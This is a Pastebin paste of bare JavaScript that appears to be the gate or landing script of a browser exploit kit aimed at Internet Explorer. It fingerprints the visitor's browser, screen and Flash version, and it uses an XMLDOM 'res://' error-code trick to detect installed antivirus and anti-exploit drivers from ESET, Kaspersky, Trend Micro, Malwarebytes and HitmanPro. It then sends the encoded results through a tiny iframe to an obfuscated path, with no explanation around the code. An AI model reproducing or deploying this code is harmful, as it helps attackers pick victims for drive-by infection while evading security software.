Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (function()
- {
- try
- {
- (function() {
- var x = new XMLHttpRequest();
- x.open('GET', '/x.gif?t=2005770848&r=5&data='+encodeURIComponent('jep'), true);
- x.send();
- })();
- function h(c, b) {
- e.c = c;
- e.r = b;
- var a = document.createElement("iframe");
- a.style.position = "absolute";
- a.width = "10px";
- a.height = "10px";
- //a.style.top = "-1000em";
- //a.style.left = "-1000em";
- a.name = "33ff2a4712374c9f";
- var h = encodeURIComponent,
- d;
- d = JSON.stringify(e);
- d += "";
- var AL = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
- var g, f, k = [],
- l = d.length - d.length % 3;
- if (0 !== d.length) {
- for (g = 0; l > g; g += 3) f = d.charCodeAt(g) << 16 | d.charCodeAt(g + 1) << 8 | d.charCodeAt(g + 2), k.push(AL.charAt(f >> 18)), k.push(AL.charAt(f >> 12 & 63)), k.push(AL.charAt(f >> 6 & 63)), k.push(AL.charAt(63 & f));
- switch (d.length - l) {
- case 1:
- f = d.charCodeAt(g) << 16;
- k.push(AL.charAt(f >> 18) + AL.charAt(f >> 12 & 63) + "==");
- break;
- case 2:
- f = d.charCodeAt(g) << 16 | d.charCodeAt(g + 1) << 8, k.push(AL.charAt(f >> 18) + AL.charAt(f >> 12 & 63) + AL.charAt(f >> 6 & 63) + "=")
- }
- d = k.join("")
- }
- a.src = "/t1q8p4saz9en1cgjr2_-_lidrwl71tsux8ea?q=" + h(d);
- document.body.appendChild(a);
- }
- function n() {
- var c;
- navigator.userAgent.match(/MSIE [6-9]/) ? c = "console" in window : (c = Object.keys(window).join(""), c = c.indexOf("__BROW") !== -1 || c.indexOf("__IE_DEV") !== -1);
- e.f = c;
- e.m = [screen.width, screen.height, "devicePixelRatio" in window ? window.devicePixelRatio : 0, "deviceXDPI" in screen ? screen.deviceXDPI : 0, "logicalXDPI" in screen ? screen.logicalXDPI : 0].join("|");
- var b;
- e.a = 0;
- try {
- b = new ActiveXObject("ShockwaveFlash.ShockwaveFlash")
- } catch (d) {
- b = document.createElement("object"), b.setAttribute("classid", "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000")
- }
- b && "GetVariable" in b && (e.a = b.GetVariable("$version").replace(/[^0-9\.\x2c]+/g, ""));
- if (b = l(a + "pci.sys"), c = l(a + "wtf.sys"), b == c) h(1, 106);
- else b:
- {
- p = c % 1E3,
- b = {
- h: [a + "ehdrv.sys", a + "eamon.sys", a + "eamonm.sys"],
- i: [a + "klif.sys", a + "klflt.sys", a + "kneps.sys"],
- c: [a + "tmtdi.sys", a + "tmactmon.sys", a + "tmcomm.sys", a + "tmevtmgr.sys"],
- d: [a + "mbam.sys", a + "mwac.sys", a + "mbae.sys", q + "mbae.dll"],
- e: [a + "hmpalert.sys"],
- j: ["invguestie/icon.png"]
- //l: [a + "vmci.sys", a + "vboxdrv.sys"]
- };
- for (var m in b)
- for (c = 0; c < b[m].length; c++) {
- var n = p;
- if (l(b[m][c]) % 1E3 !== n) {
- h(0, "2" + m + c.toString() + "");
- break b
- }
- }
- h(1, 1)
- }
- //h(1, 1)
- }
- function l(a) {
- -1 == a.indexOf("/") && (a += "/#16/#1");
- a = "res://" + a;
- var b;
- try {
- b = new ActiveXObject("Microsoft.XMLDOM"), b.async = 0, b.loadXML('<!DOCTYPE _ SYSTEM "' + a + '">')
- } catch (m) {}
- return b && b.parseError.errorCode
- }
- var e = {},
- q = "C:\\Windows\\System32\\",
- a = q + "drivers\\",
- p;
- e.g = "cpuClass" in navigator;
- e.b = navigator.appVersion;
- n();
- } catch (e) {
- (new Image).src="/e.gif?t=2005770848&r=53&data="+encodeURIComponent(e);
- }
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
